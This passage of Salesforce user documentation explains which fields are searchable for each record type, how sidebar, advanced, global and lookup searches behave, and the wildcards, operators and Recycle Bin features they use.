items with mike meyers or michael meyers. If you're using sidebar search, an * is automatically appended to the end of
the search string.
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◊ Question marks match only one character in the middle or end (not the beginning) of your search term. For example,
a search for jo?n finds items with the term john or joan but not jon or johan. If you're using global search, the ? is
removed from the end of your search term and isn't treated as a wildcard.

See Also:
Search Overview

Searchable Fields by Object
The types of records you can search vary according to the edition you have.

Search results contain matches for information within specific fields of each object. You can also search for tags. Lookup
searches support fewer searchable fields for each object.

Note:  Users can search for information in fields that are hidden from them by field-level security. When users search
for a value in a field hidden from them, search results include the record that contains the field, even though users
can't see the field.

• Article Fields

• Attachment Fields

• Business Account Fields

• Campaign Fields

• Calendar Event Fields

• Case Fields

• Chatter Feed Fields

• Chatter Group Fields

• Chatter Topic Fields

• Contact Fields

• Salesforce CRM Content Fields

• Contract Fields

• Contract Line Item Fields

• Custom Object Fields

• D&B Company Fields

• Document Fields

• Entitlement Fields

• File Fields

• Idea Fields

• Lead Fields

• Note Fields

• Opportunity Fields

• People Fields

• Person Account Fields
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• Price Book Fields

• Product Fields

• Question Fields

• Quote Fields

• Report Fields

• Requested Meeting Fields

• Service Contract Fields

• Solution Fields

• Task Fields

• User Fields

Some objects can’t be found by sidebar search or advanced search.Use global search or the object’s tabs to find:

• Articles

• Chatter groups, files, people, and information in feeds

Tip:  You can also use feed search  to find information in a specific feed, such as in a group or a on user’s
profile.

• Salesforce CRM Content

• Documents

• Products

• Solutions

See Also:
Search Overview

Searchable Fields: Article

Available in: Enterprise, Unlimited, and Developer editions

Neither sidebar search nor advanced search are designed to find articles. To find an article, use global search or the search
tools in the sidebar on the Articles tab.

Search Type

Articles TabGlobalAdvancedSidebarField Searched

All standard text fields

Body

File

All custom
auto-number fields and
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Search Type

Articles TabGlobalAdvancedSidebarField Searched

custom fields that are
set as an external ID

(You don't need to
enter leading zeros.)

All custom fields of type
text, text area, long text
area, rich text area,
email, and phone

See Also:
Searchable Fields by Object

Searchable Fields: Asset

Available in: Professional, Enterprise, Unlimited, and Developer editions

Search Type

GlobalAdvancedSidebarField Searched

Asset Name

Description

Serial Number

All custom auto-number fields
and custom fields that are set
as an external ID

(You don't need to enter
leading zeros.)

All custom fields of type text,
text area, long text area, rich
text area, email, and phone

See Also:
Searchable Fields by Object
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Searchable Fields: Attachment

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer editions

Search Type

GlobalAdvancedSidebarField Searched

File Name

See Also:
Searchable Fields by Object

Searchable Fields: Business Account

The available business account fields vary according to which Salesforce edition you have.

Search Type

GlobalAdvancedSidebarField Searched

Account Name

Account Name (Local)

Account Number

Account Site

Billing Address

Description

D-U-N-S Number (This field
is only available to
organizations that use
Data.com Prospector)

Fax

Phone

Shipping Address

Ticker Symbol

Website
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Search Type

GlobalAdvancedSidebarField Searched

All custom auto-number fields
and custom fields that are set
as an external ID

(You don't need to enter
leading zeros.)

All custom fields of type text,
text area, long text area, rich
text area, email, and phone

See Also:
Searchable Fields by Object

Searchable Fields: Campaign

Available in: Professional, Enterprise, Unlimited, and Developer editions

Search Type

GlobalAdvancedSidebarField Searched

Campaign Name

Description

All custom auto-number fields
and custom fields that are set
as an external ID

(You don't need to enter
leading zeros.)

All custom fields of type text,
text area, long text area, rich
text area, email, and phone

See Also:
Searchable Fields by Object
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Searchable Fields: Case

Available in: Group, Professional, Enterprise, Unlimited, and Developer editions

Search Type

GlobalAdvancedSidebarField Searched

Case Comments

Case Number

(You don't need to enter
leading zeros.)

Description

Subject

Web Company (of person who
submitted the case online)

Web Email (of person who
submitted the case online)

Web Name (of person who
submitted the case online)

Web Phone (of person who
submitted the case online)

All custom auto-number fields
and custom fields that are set
as an external ID

(You don't need to enter
leading zeros.)

All custom fields of type text,
text area, long text area, rich
text area, email, and phone

See Also:
Searchable Fields by Object
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Searchable Fields: Chatter Feed

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer editions

To find information in a feed, use global search or feed search. Neither sidebar search nor advanced search are designed to
find information in Chatter feeds.

Note: Global search and feed search return matches for file or link names shared in posts, but not in comments.

Search Type

FeedGlobalAdvancedSidebarField Searched

@Name (where Name is
a user name—for
example, @Madison
Rigsby)

Comment Body

Parent Record
Name

Post Body

Poster Name

See Also:
Searchable Fields by Object

Searchable Fields: Chatter Group

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer editions

Neither sidebar search nor advanced search are designed to find Chatter groups. To find a Chatter group, use global search
or the search tools on the Groups tab.

Search Type

Groups TabGlobalAdvancedSidebarField Searched

Description
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Search Type

Groups TabGlobalAdvancedSidebarField Searched

Group Name

See Also:
Searchable Fields by Object

Searchable Fields: Chatter Topic

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer editions

Neither sidebar search nor advanced search are designed to find Chatter topics. To find a topic, use global search.

Search Type

GlobalAdvancedSidebarField Searched

Description

Name

See Also:
Searchable Fields by Object

Searchable Fields: Contact

The available fields vary according to which Salesforce edition you have.

Search Type

GlobalAdvancedSidebarField Searched

Assistant

Asst. Phone

Department

Description
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Search Type

GlobalAdvancedSidebarField Searched

Email

Fax

First Name

First Name (Local)

Home Phone

Last Name

Last Name (Local)

Mailing Address

Mobile

Other Address

Other Phone

Phone

Title

All custom auto-number fields
and custom fields that are set
as an external ID

(You don't need to enter
leading zeros.)

All custom fields of type text,
text area, long text area, rich
text area, email, and phone

See Also:
Searchable Fields by Object
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Searchable Fields: Salesforce CRM Content

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer editions

Neither sidebar search nor advanced search are designed to find content. To find content, use global search (results appear as
files) or the search tools on the Content tab.

See Also:
Searchable Fields by Object

Searchable Fields: Contract

Available in: Professional, Enterprise, Unlimited, and Developer editions

Search Type

GlobalAdvancedSidebarField Searched

Billing Address

Contract Name

Contract Number

Description

Shipping Address

Special Terms

All custom auto-number fields
and custom fields that are set
as an external ID

(You don't need to enter
leading zeros.)

All custom fields of type text,
text area, long text area, rich
text area, email, and phone

See Also:
Searchable Fields by Object
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Searchable Fields: Contract Line Item

Available in: Enterprise, Unlimited, and Developer editions with the Service Cloud

Search Type

GlobalAdvancedSidebarField Searched

Description

Name

See Also:
Searchable Fields by Object

Searchable Fields: Custom Object

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer editions

Custom object records appear in search results only if they have a custom tab.

Search Type

GlobalAdvancedSidebarField Searched

Name

All custom auto-number fields
and custom fields that are set
as an external ID

(You don't need to enter
leading zeros.)

All custom fields of type email
and phone

All custom fields of type text,
text area, long text area, and
rich text area

See Also:
Searchable Fields by Object
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Searchable Fields: D&B Company

Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

To have access to D&B Company records, your organization must have Data.com Premium Prospector or Data.com Premium
Clean.

Search Type

GlobalAdvancedSidebarField Searched

Company Description

D-U-N-S Number

Facsimile Number

Mailing Address

Primary Address

Primary Business Name

Telephone Number

Ticker Symbol

URL

See Also:
Searchable Fields by Object

Searchable Fields: Document

Available in: All editions except Database.com

To find a document, use global search or the Find Document button on the Documents tab. Neither sidebar search nor
advanced search are designed to find documents.

See Also:
Searchable Fields by Object
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Searchable Fields: Entitlement

Available in: Enterprise, Unlimited, and Developer editions with the Service Cloud

Search Type

GlobalAdvancedSidebarField Searched

Name

All custom auto-number fields
and custom fields that are set
as an external ID

(You don't need to enter
leading zeros.)

All custom fields of type text,
text area, long text area, rich
text area, email, and phone

See Also:
Searchable Fields by Object

Searchable Fields: File

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer editions

Neither sidebar search nor advanced search are designed to find files. To find a file, use global search or the search tools on
the Files tab.

Search Type

Files TabGlobalAdvancedSidebarField Searched

Body

Description

Extension (such as
ppt)

Name

Owner
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Search Type

Files TabGlobalAdvancedSidebarField Searched

All custom
auto-number fields and
custom fields that are
set as an external ID

(You don't need to
enter leading zeros.)

All custom fields of type
text, text area, long text
area, rich text area,
email, and phone

See Also:
Searchable Fields by Object

Searchable Fields: Idea

Available in: Professional, Enterprise, Unlimited, and Developer editions

Search Type

GlobalAdvancedSidebarField Searched

Comment

Description

Title

See Also:
Searchable Fields by Object
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Searchable Fields: Lead

Available in: Group, Professional, Enterprise, Unlimited, and Developer editions

Search Type

GlobalAdvancedSidebarField Searched

Address

Company

Company D-U-N-S Number
(This field is only available to
organizations that use
Data.com Prospector)

Description

Email

Fax

First Name

First Name (Local)

Last Name

Last Name (Local)

Mobile

Phone

Title

All custom auto-number fields
and custom fields that are set
as an external ID

(You don't need to enter
leading zeros.)

All custom fields of type text,
text area, long text area, rich
text area, email, and phone

See Also:
Searchable Fields by Object
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Searchable Fields: Note

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer editions

Search Type

GlobalAdvancedSidebarField Searched

Body

Title

See Also:
Searchable Fields by Object

Searchable Fields: Opportunity

The available fields vary according to which Salesforce edition you have.

Search Type

GlobalAdvancedSidebarField Searched

Description

Opportunity Name

All custom auto-number fields
and custom fields that are set
as an external ID

(You don't need to enter
leading zeros.)

All custom fields of type text,
text area, long text area, rich
text area, email, and phone

See Also:
Searchable Fields by Object
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Searchable Fields: People

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer editions

Neither sidebar search nor advanced search are designed to find people; however, sidebar search and advanced search can be
used to find users. See Searchable Fields: User.

To find people, use global search or the search tools on the People tab.

Search Type

People TabGlobalAdvancedSidebarField Searched

About Me

Email

First Name

Last Name

Name

Nickname

Phone

Record ID (15
character Record ID
only)

Username

All custom
auto-number fields and
custom fields that are
set as an external ID

(You don't need to
enter leading zeros.)

All custom fields of type
text, text area, long text
area, rich text area,
email, and phone

Note: Information in hidden fields on a profile is not searchable by other partners and customers in the community,
but is searchable by users in the company’s internal organization.

See Also:
Searchable Fields by Object
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Searchable Fields: Person Account

Available in: Enterprise, Unlimited, and Developer editions

The available person account fields vary according to which Salesforce edition you have.

Search Type

GlobalAdvancedSidebarField Searched

Account Name

Account Name (Local)

Account Number

Account Site

Assistant

Assistant Phone

Billing Address

Description

Email

Fax

Home Phone

Mailing Address

Mobile

Other Address

Other Phone

Shipping Address

Ticker Symbol

Title

Website

All custom auto-number fields
and custom fields that are set
as an external ID

(You don't need to enter
leading zeros.)
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Search Type

GlobalAdvancedSidebarField Searched

All account and contact
custom fields of type text, text
area, long text area, rich text
area, email, and phone

See Also:
Searchable Fields by Object

Searchable Fields: Price Book

Available in: Professional, Enterprise, Unlimited, and Developer editions

Neither sidebar search nor advanced search are designed to find price books. To find a price book, use global search or the
Price Books area on the Products tab.

See Also:
Searchable Fields by Object

Searchable Fields: Product

Available in: Professional, Enterprise, Unlimited, and Developer editions

Neither sidebar search nor advanced search are designed to find price books or products. To find a product, use global search
or the Find Products area on the Products tab.

See Also:
Searchable Fields by Object
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Searchable Fields: Question

Available in: Enterprise, Unlimited, and Developer editions

The Answers tab in Salesforce lists all the questions posted to an answers community.

Search Type

GlobalAdvancedSidebarField Searched

Question Body

Question Title

Reply Body

See Also:
Searchable Fields by Object

Searchable Fields: Quote

Available in: Professional, Enterprise, Unlimited, and Developer editions

Search Type

GlobalAdvancedSidebarField Searched

Quote Name

Quote Number

See Also:
Searchable Fields by Object
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Searchable Fields: Report

Available in: All editions except Database.com

Search Type

GlobalAdvancedSidebarField Searched

Description

Report Name

See Also:
Searchable Fields by Object

Searchable Fields: Service Contract

Available in: Enterprise, Unlimited, and Developer editions with Service Cloud

Search Type

GlobalAdvancedSidebarField Searched

Contract Number

Description

Name

Special Terms

See Also:
Searchable Fields by Object
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Searchable Fields: Solution

Available in: Professional, Enterprise, Unlimited, and Developer editions

Neither sidebar search nor advanced search are designed to find solutions. To find a solution, use global search or the Find
Solution button on the Solutions tab.

See Also:
Searchable Fields by Object

Searchable Fields: Task, Calendar Event, and Requested Meeting

Available in: All editions except Database.com

Archived activities are accessible in advanced search only.

Search Type

GlobalAdvancedSidebarField Searched

Comments (task and events
only)

Subject

All custom auto-number fields
and custom fields that are set
as an external ID

(You don't need to enter
leading zeros.)

All custom fields of type text,
text area, long text area, rich
text area, email, and phone

See Also:
Searchable Fields by Object
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Searchable Fields: User

The available fields vary according to which Salesforce edition you have.

If you're using Chatter and searching for people, see Searchable Fields: People.

Search Type

GlobalAdvancedSidebarField Searched

About Me

Email

First Name

Last Name

Name

Nickname

Phone

Record ID (15 character
Record ID only)

Username

All custom auto-number fields
and custom fields that are set
as an external ID

(You don't need to enter
leading zeros.)

All custom fields of type text,
text area, long text area, rich
text area, email, and phone

See Also:
Searchable Fields by Object
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Tags that Show Up in Search
Available in: All editions

You can search for tags in sidebar, advanced, and global search.

See Also:
Searchable Fields by Object

Search Results
Available in: All Editions except Database.com

Your search results include items and tags that you have permission to view. How your results appear and how you can interact
with them depends on whether you’re using:

• Sidebar or advanced search

• Global search

Regardless of your search type, you can:

• Filter your search results

• Customize columns in your search results

• (Administrators only) Customize filters for all users’ search results

Search Results
Available in: All Editions

The search results page displays items for each object, custom object, tag, and Chatter feed that you have permission to view.

From this page, you can:

• Jump directly to an object's results—click any object on the left side of the page.

The number of results for each object is displayed. For example, Contacts [25+] means there are more than 25 contacts
that match your search criteria. If your search returns a large number of results for a particular object, click Next Page or
Previous Page to view the results.

• Jump to Chatter Feed Search Results.

• View or edit items—click an item to open it or click Edit, if available.

• Refine your search results by clicking Options... below the search box or above the list of objects on the left hand side:
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Choose which objects to search

In the Objects section, select the objects for which you want to return search results. If you don't select any objects,
your search returns all possible objects. Select All or click Clear All to quickly select all or no objects.

Search only items you own

In the More Options section, select Limit to items I own.

Note:  When Limit to items I own is selected, the search results don't return article, asset, idea,
invoice, order, people, product, question, quote, and reply records because these records don't have owners.

Search for an exact phrase

In the More Options section, select Exact phrase. This is the same as using quotation marks around your search
string.

Search within a division

If you have the Affected by Divisions permission, specify which divisions you want to search. If your organization
uses divisions but you don't have the “Affected by Divisions”  permission, your search results include records from
all divisions.

• Click Search.

The search options you select are saved until you change them. Click  to clear your search terms.

Note: Chatter feed searches aren’t affected by your search scope; Chatter feed search results include matches
across all objects.

Search options aren't available to Chatter Free users.

• Customize columns in your search results.

• Filter your search results.

SIDEBAR SEARCH

How Sidebar Search Works
Available in: All Editions except Database.com

How your sidebar search works depends on your search options, search terms, and the use of wildcards.

Search Options

Sidebar search searches only a subset of records and fields, including name, phone, email, and standard address fields.
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If the sidebar search drop-down list is available, you can limit your search to only tags or the records for a single object.
If the sidebar search Limit to items I own checkbox is available, you can select this box to limit your search to
records you own.

Search Terms

Searches are conducted as a phrase search and match terms in the exact sequence that they appear. For example, searching
for bob jones returns items with Bob Jones, but not Bobby Jones or Bob T Jones. Likewise, searching for acct!4 only
returns items with acct!4 in a single string.

Wildcards and Operators

You can use the * (asterisk) and ? (question mark) wildcards to refine results. Use * to match one or more characters, or
? to match a single character. An * is automatically appended to your search string. For example, searching for bob jo
finds items with Bob Jones and Bob Johnson, and searching for jo?n finds items with john and joan. You can't use operators
to refine results in sidebar search.

See Also:
Search Overview

Changing Sidebar Search Options
Available in: All Editions except Database.com

Refine your search results by:

Choosing which objects to search

If the sidebar search drop-down list is available, you can limit your search to a single object. In the drop-down list, select
the object you want. Select Search All to search across all objects.

Note: When all objects are selected, the search results don't return article, article management, content,
document, product, and solution records. You can search for these records on their respective tabs.

Searching only items you own

If the Limit to items I own checkbox is available, you can search only items you own, including case comments
and reports that you created.

Note: When Limit to items I own is selected, the search results don't return asset, idea, invoice, order,
question, quote, reply, and user records because these records don't have owners.

Searching within a division

If you have the “Affected by Divisions” permission, specify which divisions you want to search. If your organization uses
divisions but you don't have the “Affected by Divisions” permission, your search results include records in all divisions.

If you restrict your search options, the options you select appear under the search box on the Search Results page.
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Using the Recycle Bin
Available in: All Editions except for Database.com

User Permissions Needed

“Read” on the records in the Recycle BinTo view and recover your deleted records:

“Modify All Data”To view and recover records deleted by other users:

“Tag Manager”To recover deleted public tags:

“Modify All Data”To purge the Recycle Bin:

The Recycle Bin link in the sidebar lets you view and restore recently deleted records for 15 days before they are permanently
deleted. Your Recycle Bin record limit is 25 times the Megabytes (MBs) in your storage. For example, if your organization
has 1 GB of storage then your limit is 25 times 1000 MB or 25,000 records. If your organization reaches its Recycle Bin limit,
Salesforce automatically removes the oldest records if they have been in the Recycle Bin for at least two hours.

Viewing Items in the Recycle Bin

Choose My Recycle Bin from the drop-down list to view just the items you deleted. Administrators, and users with the
“Modify All Data” permission, can choose All Recycle Bin to view all data that has been deleted for the entire organization.
In Personal Edition, the All Recycle Bin option shows all of your deleted items.

Searching for Items in the Recycle Bin

1. Choose My Recycle Bin or All Recycle Bin from the drop-down list. Choosing My Recycle Bin searches for matches
only in the items you deleted.

2. Enter your search terms. Search terms are treated as separate words with an implied AND between them. For example,
searching for bob jones returns items with bob and jones together but not bob smith whose email address is bsmith@jones.com.
An implied wildcard is appended to your search terms so searching for bob returns any bob or bobby. Searches look for
matches in the field displayed in the Name column of the Recycle Bin such as lead Name, Case Number, Contract
Number, or Product Name.

Note:  Some search features, including stemming and synonyms, are not available in the Recycle Bin search.

3. Click Search.

Restoring Items in the Recycle Bin

You can restore items by checking the box next to those items and clicking Undelete. To restore all deleted items, check the
box in the column header and then click Undelete.

When you undelete a record, Salesforce restores the record associations for the following types of relationships:

• Parent accounts (as specified in the Parent Account field on an account)
• Parent cases (as specified in the Parent Case field on a case)
• Master solutions for translated solutions (as specified in the Master Solution field on a solution)
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• Managers of contacts (as specified in the Reports To field on a contact)
• Products related to assets (as specified in the Product field on an asset)
• Opportunities related to quotes (as specified in the Opportunity field on a quote)
• All custom lookup relationships
• Relationship group members on accounts and relationship groups, with some exceptions
• Tags
• An article's categories, publication state, and assignments

Note: Salesforce only restores lookup relationships that have not been replaced. For example, if an asset is related to
a different product prior to the original product record being undeleted, that asset-product relationship is not restored.

Purging the Recycle Bin

To permanently remove your deleted items prior to the 15 day period, administrators, and users with the “Modify All Data”
permission, can click Empty your Recycle Bin or Empty your organization’s Recycle Bin .

See Also:
Deleting Records

ADVANCED SEARCH

How Advanced Search Works
Available in: All Editions except Database.com

How your advanced search works depends on your search options, search terms, and the use of wildcards and operators.

Search Options

Advanced search searches more record types and fields than sidebar search, including attachments, custom fields, and
long text fields such as descriptions, notes, and task and event comments.

Select Limit to items I own, if available, to limit your search to records you own, including case comments and
reports that you created. Click Advanced Search... and choose one or more objects by which to limit your search. You
can also restrict your search to divisions, if your organization uses them.

Search Terms

Search terms are treated as separate words and may be found in different searchable fields within a record. For example,
searching for bob jones returns items with Bob Jones, as well as a contact named Bob Smith whose email address is
bsmith@jones.com.

Search terms are separated by letter, number, and punctuation boundaries. For example, searching for acct!4 returns
items with Acct, !, and 4, even if those terms are in separate places in the item.
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Wildcards and Operators

You can use the * (asterisk) and ? (question mark) wildcards to refine results. Use * to match one or more characters, or
? to match a single character. For example, searching for bob jo* finds items with Bob Jones and Bob Johnson, and
searching for jo?n finds items with john and joan. You can also use the AND, OR, AND NOT, ( ) (parentheses), and
" " (quotation marks) operators to refine results.

See Also:
Search Overview

Changing Advanced Search Scope
Available in: All Editions except Database.com

1. Click Advanced Search... in the sidebar.
2. Refine your search results by:

Searching only items you own

In the Advanced Options section, select Limit to items I own, if available.

Note: When Limit to items I own is selected, the search results don't return asset, idea, invoice,
order, question, quote, reply, and user records because these records don't have owners.

Searching for an exact phrase

In the Advanced Options section, select Exact phrase. This is the same as using quotation marks around your
search string.

Searching within a division

If you have the “Affected by Divisions” permission, specify which divisions you want to search. If your organization
uses divisions but you don't have the “Affected by Divisions” permission, your search results include records in all
divisions.

Choosing which objects to search

In the Scope section, select the objects for which you want to return search results. If you don't select any objects,
your search returns all possible objects. Click Select All or Deselect All to quickly select all or no objects.

Note: When all objects are selected, the search results don't return article, article management, content,
document, product, and solution records. You can search for these records on their respective tabs.

3. Click Search.

If you restrict your search scope, the scope you select appears under the search box on the Advanced Search Results page.
Click Advanced Search under the search box to change your search scope again.
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Sidebar and Advanced Search Results
Available in: All Editions except Database.com

Your search results include related lists for items and tags that you have permission to view.

From this page you can:

• Click a related list item at the top of the page to jump directly to an object's results.

Objects with results are displayed in alphabetical order. The number of results for each object is displayed. For example,
Contacts [25+] means there are more than 25 contacts that match your search criteria. If your search returns a large number
of results for a particular object, click Next Page or Previous Page to view the results.

• Click a result to open it or click Edit, if available.

• Click My Columns (or, if you’re an administrator, click Customize... > My Columns) to customize columns in your
search results.

• Click Show Filters, if available, to filter your search results.

• Click Advanced Search..., if available, to refine your search.

GLOBAL SEARCH

How Global Search Works
Available in: All Editions except Database.com

Global search searches more record types, including articles, documents, products, solutions, and Chatter feeds, files, groups,
topics, and people. Global search also searches more field types, including custom fields and long text fields such as descriptions,
notes, and task and event comments. Global search keeps track of which objects you use and how often you use them, and
arranges the search results accordingly. Search results for the objects you use most frequently appear at the top of the list. If
global search doesn’t have enough information about which objects you use, you see results for all objects until it has more
information.

How your global search works depends on your search options, search terms, and the use of wildcards and operators.

Search Options

Search options let you restrict your search to the records you own, if available; to exact phrase searches; and to divisions,
if your organization uses them.

The search options you select are saved until you change them.

Note: Chatter feed searches aren’t affected by your search scope; Chatter feed search results include matches
across all objects.
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Search options aren't available to Chatter Free users.

Search Terms

Search terms are treated as separate words and may be found in different searchable fields within a record. For example,
searching for bob jones returns items with Bob Jones, as well as a contact named Bob Smith whose email address is
bsmith@jones.com.

Search terms are separated by letter, number, and punctuation boundaries. For example, searching for acct!4 returns
items with Acct, !, and 4, even if those terms are in separate places in the item.

Tip:  If you'd like to conduct a phrase search to match multiple terms in the exact sequence that they appear,
select Exact phrase in the Options or use quotations marks around your search terms.

Wildcards and Operators

You can use the * (asterisk) and ? (question mark) wildcards to refine results. Use * to match one or more characters, or
? to match a single character. For example, searching for bob jo* finds items with Bob Jones and Bob Johnson, and
searching for jo?n finds items with john and joan. You can also use the AND, OR, AND NOT, ( ) (parentheses), and
" " (quotation marks) operators to refine results.

See Also:
Search Overview

Changing Global Search Options
Available in: All Editions except Database.com

1. Click Options... next to the search box in the results page.

Search options aren't available to Chatter Free users.

2. Refine your search results by:

• Selecting Limit to items I own, if available.

Note:  When Limit to items I own is selected, the search results don't return article, asset, idea, invoice,
order, people, product, question, quote, and reply records because these records don't have owners.

• Selecting Exact phrase. This is the same as using quotation marks around your search string.
• Searching within a division. If you have the “Affected by Divisions” permission, specify which divisions you want to

search. If your organization uses divisions but you don't have the “Affected by Divisions” permission, your search results
include records in all divisions.

3. Click Save & Search.

The search options you select are saved until you change them.
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Note: Chatter feed searches aren’t affected by your search scope; Chatter feed search results include matches
across all objects.

Global Search Results
Available in: All Editions except Database.com

Watch a Demo: Using Smart Search (2:12 minutes)

Your search results include items and tags that you have permission to view. Global search keeps track of which objects you
use and how often you use them, and arranges the search results accordingly. Search results for the objects you use most
frequently appear at the top of the list. If global search doesn’t have enough information about which objects you use, you see
results for all objects until it has more information.

Custom object records appear in search results only if they have a custom tab. If your Salesforce administrator has enabled
and defined external objects that access SharePoint in your company, your search results may include matches for items in the
SharePoint server.

From this page you can:

1. Click Search Feeds at the top left of the page to see Chatter posts and comments that include your search terms.

Tip:  On the search results page for feeds, save the feed search to your favorites on the Chatter page by clicking
Add to Favorites.

2. Quickly see which items (ordered by most frequent use) were searched.

• Click any item to see only that item's results.
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• Hover over and pin important items to the top of your results to manually change the order. You can always unpin
them later.

3. Click Search All at the bottom of the left side or under the related lists to do a one-time search across all items using your
current search terms.

After clicking Search All, you can pin items that don’t appear in your scope to the top of your search results. You can
always unpin them later.

4. Use the search box in the page to search within your current view. For example, if you drill down to view Chatter feeds
and then decide to search Chatter for something different, enter your new search terms and click Search Feeds to search
across all Chatter posts and comments.

Note:  Search results for feeds include matches for file or link names shared in posts, but not in comments.

5. Click Options... to restrict your search to records you own, if available, to exact phrase searches, and to divisions, if your
organization uses them.

6. Take a guided tour of the search results.
7. See up to five results for each item you searched.

• Click a result to open it or click Edit, if available.
• Click column headings to sort results in ascending or descending order.
• Click Show Filters, if available, to filter your search results.
• Click Show More to drill down to the full list of that item's results.

8. Drill down to a specific item's results, and then:

• Click Show Filters, if available, to filter your search results.
• Click My Columns (or, if you’re an administrator, click Customize... > My Columns) to customize columns in your

search results.

Tip:  To search the posts and comments in a specific feed, such as on a profile, on a record, or in a group, use the

feed search ( ) at the top of the feed.
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Lookup Dialog Search
Available in: All Editions

Salesforce objects often include lookup fields that allow you to associate two records together in a relationship. For example, a
contact record includes an Account lookup field that represents the relationship between the contact and its associated
organization. The object that contains the lookup field is the source object, while the object the lookup points to is the target
object.

Lookup fields appear with the  button on record edit pages. Clicking  opens a lookup search dialog that allows you to
search for the record that should be associated with the one being edited. A blank lookup is performed when you click the
lookup icon without entering a search term.

Salesforce provides two types of lookups.

Standard Lookups

By default, all lookups behave as standard lookups. When searching for records with a standard lookup, only the fields
listed in Searchable Fields in Lookup Searches are queried. Standard lookups return up to 50 records at a time in
alphabetical order and don't allow for sorting, filtering, or customizable columns.

Enhanced Lookups

If enabled by your administrator, account, contact, user, and custom object lookups can behave as enhanced lookups.
Enhanced lookups update standard lookup fields with the following functionality:
• Enhanced lookup search queries are broken into separate search terms at any split between alphabetic, numeric, and

special characters. For example, if you enter ALL4ONE in an enhanced lookup field, the resulting query searches for
ALL and 4 and ONE. Consequently, entering ALL and 4 and ONE returns matches for ALL4ONE. Also, searching
for S& returns fields containing both S& and &S.

• Enhanced lookups allow users to sort and filter search results by any field that is available in regular search results.
Users can also hide and reorganize the columns that are displayed in the results window.

Note:  In addition to user-controlled filters, administrators can create lookup filters on fields that are in a
lookup, master-detail, or hierarchical relationship to limit the valid values in lookup dialog results for the
field.

• Enhanced lookups return all records that match your search criteria and allow you to page through large sets of search
results.

When you click a standard or enhanced lookup icon before entering anything in the lookup field, a list of all recently used
records displays. However, for standard lookups of products and queues, the dialog shows an alphabetical listing of the first
50 records. For standard lookups of campaigns, the dialog shows the first 100 active campaigns. For the asset standard lookup
on a case, the dialog shows all the assets tied to the contact on the case, if any. If you click the standard or enhanced lookup
icon next to a field that is populated with a string, the string value is used as the search query. For standard or enhanced lookups
of users, the dialog shows a list of recently accessed user records from across your organization. If you perform a blank
lookup—that is, you click the lookup icon without entering a search term—filters only apply to items in the most recently used
list. Otherwise, filters apply to both this list and the resulting records of the lookup.
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Note:  Only active users are searchable, except in the lookup for mass transfers, where inactive users are also searchable.

Lookup Auto-Completion
If enabled by your administrator, both standard lookups and enhanced lookups can display a dynamic list of matching recently
used records when a lookup field is edited. This list is restricted to objects of the appropriate type and, with the exception of
lookups of users, is populated from recently used items. For example, while editing an Account lookup, you can see recently
used accounts with names that match the prefix you have entered. Recently used contacts don't appear in this list.

Lookup auto-completion is subject to the following restrictions:

• You must have recently visited records of the appropriate type for the lookup's auto-completion list to be populated.
• You must be editing the lookup field on a record's edit page.

Hover details are displayed only for lookup fields on object types that are included in lists of recently used records. For example,
products aren’t included in lists of recently used records, so hover details aren’t displayed for a lookup field on products.

Tips for Using Standard and Enhanced Lookups
Consider these tips when using standard and enhanced lookups.

• In standard lookup searches, a wildcard is automatically appended to each of your search terms. For example, a search for
bob jo is really a search for bob* jo* and returns items with bob jones, bobby jones, or bob johnson. You can also explicitly
use an asterisk (*) wildcard in your search string.

• For enhanced lookups in particular, the wildcard can't be the first character in the search term or phrase, and search results
may include more records than you expect if your search terms contain a combination of letters, numbers, and special
characters.

• If you enter a value in the lookup text box and save the record without clicking the lookup icon ( ), Salesforce automatically
performs a standard lookup search. If it finds an exact match, it saves that value to the lookup field, even if it finds other
partial matches. If it doesn’t find an exact match and finds one or more partial matches, Salesforce requires you to select
a value from a drop-down list of matches. If no results match the text you entered, an error displays instead.

• To search for contacts, leads, users, or other individuals that include spaces in the First Name or Last Name fields,
enter quotes around the terms.

For example, to search for bob von hausen, enter "bob von hausen".

• In organizations where the Salesforce Customer Portal or partner portal is enabled, you can filter the results that appear
on the user lookup dialog by selecting either a queue or group of users from the Owner or Assigned To drop-down list.

• If your organization uses divisions and you have the “Affected by Divisions” permission, your lookup dialog search results
include records in the division you select in the lookup dialog window.

Searchable Fields in Lookup Searches

Available in: All editions

The lookup icon, which appears as a magnifying glass next to many fields, opens a dialog that allows you to search for other
records. Below is the list of fields that are used for matching when searching in the standard or enhanced lookup dialog.
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Enhanced LookupsStandard LookupsFields SearchedType of Record

Account Name

Account Name (Local)

Website

Account

Campaign NameCampaign

Case NumberCase

Community NameCommunity

First Name

First Name (Local)

Last Name

Contact

Last Name (Local)

Contract Name

Contract Number

Contract

TitleDiscussion

Document Name

Keywords

Document

TitleIdea

Company

Company (Local)

Name

Lead

Name (Local)

Account Name

Opportunity Name

Opportunity

Product Code

Product Name

Product

First Name

Last Name

Self-Service User

Solution TitleSolution
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Enhanced LookupsStandard LookupsFields SearchedType of Record

First Name

Last Name

Name

User

Note:  Only active
users are searchable.

NameCustom Objects

See Also:
Lookup Dialog Search
Searchable Fields by Object

REFINE SEARCH RESULTS

Refining Search Using Operators
Available in: All Editions except Database.com

Operators not available in: Connect Offline

Sidebar and standard lookup search don't support the use of operators.

Operators

Operator support is case-insensitive.

DescriptionOperator

Finds items that match all of the search terms. For example, acme AND california finds
items with the word acme and the word california, but not items with only the word acme.

Using AND is optional in most cases, because searching for acme california is the same
as searching for acme AND california. However, when searching articles, documents,

AND

and solutions on their respective tabs, AND must be used because OR is the default operator
for these objects on their tabs.

Finds items with at least one of the search terms. For example, acme OR california
finds items with either acme or california or both.

OR

Finds items that don't contain the search term. For example, acme AND NOT california
finds items that have the word acme but not the word california.

AND NOT
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DescriptionOperator

Group search terms together. Grouped search terms are evaluated before other search terms
in your string. See Search Order on page 130.

( ) (parentheses)

